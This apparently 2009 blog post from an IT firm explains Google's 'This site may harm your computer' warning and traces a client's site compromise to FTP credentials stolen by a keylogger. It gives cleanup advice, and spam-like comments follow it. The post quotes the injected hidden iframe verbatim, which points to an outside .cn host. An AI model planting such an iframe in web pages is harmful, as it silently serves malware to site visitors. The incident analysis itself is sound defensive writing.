Google Search Results: “This site may harm your computer”

Google has introduced a new piece of logic into their indexing engine, which detects malware embedded within websites.  If your website has been compromised, which I’ll explain what ‘compromised’ means later, then you will see “This site may harm your computer” when you search Google for your website.

Within this article we will discuss

  1. What does it mean to have a compromised website
  2. How does a compromise occur
  3. How to resolve this issue
  4. How to I work with Google to remove the “This site may harm your computer” link

What does it mean to have a compromised website?

Recently we had a client call us with this concern.  Several of his clients contacted him and said that when they searched for his website on Google, they were presented with a link under the title of the result page that said “This site may harm your computer”.  The result looked just like this:

This site may harm your computer

How did this happen?

In this case, it is easy to look at the result of the attack and work backward toward how the attack occurred.  Here is what we know;

  1. The attacker placed the following line of code on a website file:
    <iframe src="http://filmlifeimages.cn:8080/index.php"
    width=180 height=111 style="visibility: hidden"></iframe>
  2. After consulting with the client, who had FTP access, we knew that he was not responsible for uploading a file containing this information
  3. We noted the date of the modified file on the file system 6/10/2009 @  2:08am CST
  4. We then looked at the FTP log files to understand what happened on the 10th at 2:08am.
  5. The log file outlined that every page on the site was overwritten, status 226, on or around 2:08am
  6. The account used to access the server was a valid FTP account.
Based on this information, and a few other things that we collected from the client, we are 99% sure that the client’s computer was infected by a ‘keylogger’ program.  A ‘keylogger’ does exactly what it sounds like, it logs all of the keystrokes you make on your computer, and oftentimes, transmits the data to a computer outside of your network, which is then accessed by the hacker.
To test our ‘keylogger’ theory, we connected a dummy system to the infected website and sure enough, we were infected with a keylogger.

How do I resolve this issue?
If you are the hosting company – you should know what to do.  Reset the FTP account password, remove ‘any’ access to port 21 on your firewall and begin restricting access by IP or VPN.

If you are the client – your computer, and potentially your network is infected with a keylogger program.  Our suggestion is that you complete the following steps immediately.

  1. If you do online banking, call your bank immediately to have your account credentials changed
  2. If you have purchased anything online recently, call your credit card companies and have them reissue you a new card.
  3. If you have provided any websites significant information about your identity, contact an identity theft company

Once you have completed the steps above, you now have to remove the keylogger program from your system.  We recommend using AVAST, found at http://www.avast.com/, there are several types of software like this out on the internet.  Run a full scan of your system and remove all of the infected files.  Moving forward, you should run these types of programs constantly and conduct full system/network scan on a routine basis.

How to I work with Google to remove the “This site may harm your computer” link

The process to remove the “harmful” status is very basic. Navigate to this website and scroll to the bottom of the page  http://www.google.com/support/webmasters/bin/answer.py?answer=45432

Tags: , , ,

6 Responses to “Google Search Results: “This site may harm your computer””

  1. Thomas J. Raef Says:

    We have seen many of these iframe infections lately. It seems to the be the website infection dujour.

    It could be a keylogger or it could also be a virus we’ve seen a lot of that sniffs the FTP traffic from the PC to the website. As you know, FTP transmits in plain text. So all data, including the username and password are easy to sniff in the traffic stream. This information is then sent to a server that takes that information, logs in to the site, modifies the code, then monitors it for any changes. If the malicious server detects any changes or missing malscripts, it tries to re-infect the website.

    We’ve seen many reports of website owners complaining that part of their morning breakfast ritual is to re-upload their site. After changing the FTP password and scanning their PC and cleaning it, we recommend that all website owners move away from FTP and go to either SFTP or FTPS both of which encrypt their transmissions making it nearly impossible to sniff the FTP credentials.

    Just thought you might like to pass that along to your readers as well.

    Thank you.

  2. Search file Says:

    great info liked it…

  3. Geri D. Mahoney Says:

    Highly informative write up. I am off to share this with my friends.

  4. Compras Panama Says:

    Superb, thanks for posting!

  5. Thedutchguy Says:

    Great article, will definitly check out this website for more! Keep it up. regards.

  6. world cup 2010 betting odds Says:

    This is one of the most honest blogs I have ever read. Nothing overcomes good first hand experience on topics. Thank you for being sincere about this.

Leave a Reply

Like what you see? Let's talk.

Monday - Friday, 8:30am - 8:00pm EST.
Call us at 617-229-7210
*Required Fields